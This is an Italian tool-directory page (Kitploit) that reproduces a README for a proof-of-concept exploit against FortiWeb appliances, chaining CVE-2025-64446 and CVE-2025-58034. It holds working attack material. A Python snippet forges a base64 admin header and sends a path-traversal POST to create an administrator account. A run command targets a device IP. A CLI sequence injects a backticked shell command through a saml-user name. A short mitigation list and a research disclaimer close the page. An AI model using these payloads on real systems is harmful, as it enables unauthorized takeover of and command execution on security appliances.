Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Vulnerability-CVE-2025-64446-CVE-2025-58034 — Exploit PoC per FortiWeb CVE-2025-64446 (bypass dell'autenticazione tramite path traversal) e CVE-2025-58034 (iniezione di comandi del sistema operativo) con analisi dettagliata e guida alla mitigazione. | Kitploit
Strumenti/GitHubGitHub/litndat/vulnerability-cve-2025-64446-cve-2025-58034
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHublitndat/vulnerability-cve-2025-64446-cve-2025-58034

Vulnerability-CVE-2025-64446-CVE-2025-58034

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit PoC per FortiWeb CVE-2025-64446 (bypass dell'autenticazione tramite path traversal) e CVE-2025-58034 (iniezione di comandi del sistema operativo) con analisi dettagliata e guida alla mitigazione.

Vedi Repository
133 mesi faNon ancora revisionato

Simulazione di sfruttamento di FortiWeb (CVE-2025-64446 & CVE-2025-58034)

Nota:

  • Questo documento è solo a scopo didattico e di ricerca sulla sicurezza.
  • Non utilizzare per attaccare sistemi senza autorizzazione.

1. Panoramica

FortiWeb è un dispositivo Web Application Firewall (WAF) utilizzato per proteggere le applicazioni web.

Nel 2025 sono state scoperte due vulnerabilità critiche:

  • CVE-2025-64446 – Bypass dell'autenticazione tramite Path Traversal
  • CVE-2025-58034 – OS Command Injection

2. Panoramica di CVE-2025-64446

CampoContenuto
Tipo di vulnerabilitàRelative Path Traversal
Authentication Bypass
CausaFortiWeb gestisce i percorsi in modo non rigoroso prima dell'autenticazione:

- Controllo degli accessi basato su stringhe di percorso logiche
- Non normalizza completamente il percorso
- Consente l'uso di ../ per accedere a risorse interne
DescrizioneAlcuni endpoint amministrativi possono essere accessibili senza autenticazione valida
Impatto- Bypass completo dell'autenticazione
- Accesso non autorizzato alle funzioni di amministrazione
- Rottura del modello di autorizzazione
Versioni interessate- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

Esempio:

/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. Panoramica di CVE-2025-58034

CampoContenuto
Tipo di vulnerabilitàOS Command Injection (CWE-78)
CausaFortiWeb gestisce l'input in modo non sicuro durante l'esecuzione di comandi di sistema:

- Nessuna convalida dell'input
- Mancata escape dei caratteri speciali
- Passaggio diretto dei dati utente al comando di sistema
DescrizioneLa vulnerabilità richiede autenticazione ma consente l'iniezione di comandi di sistema
Impatto- Esecuzione di comandi indesiderati
- Accesso alle risorse di sistema
- Compromissione dell'integrità e della disponibilità
Versioni interessate- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

4. Processo di sperimentazione (POC)

4.1. Preparazione dell'ambiente:

python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

Questo aiuta a evitare conflitti di versione delle librerie, garantire la stabilità dell'ambiente di lavoro e limitare l'impatto sul sistema.

image

4.2 Sfruttamento

Payload

 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

Esegui lo strumento con Python3:

python3 exploit.py <IP_target>
  • <IP_target>: L'indirizzo IP qui è il nome host del dispositivo FortiWeb.
image

Ottenuti username e password -> procedere al login

image image

Sfruttamento riuscito e creazione di un nuovo account con privilegi di amministratore.

4.3 Sfruttamento di CVE-2025-58034 dopo l'accesso con account

Dopo aver effettuato l'accesso con il nuovo account amministratore, un utente malintenzionato può sfruttare la vulnerabilità di iniezione di comandi autenticati tramite richieste appositamente create o direttamente tramite l'interfaccia a riga di comando di FortiWeb CLI:

config user saml-user

edit "`id`" ## inserire il comando qui

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

FortiWeb uscirà dalla stringa di configurazione ed eseguirà il comando id durante la configurazione di saml-user.

5. Alcune misure di mitigazione

  • Aggiornare FortiWeb alla versione patchata.
  • Limitare l'accesso all'interfaccia di amministrazione.
  • Non esporre l'interfaccia di gestione su Internet.
  • Controllare account amministratore anomali.

6. Riferimenti aggiuntivi

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
Scarica lo strumento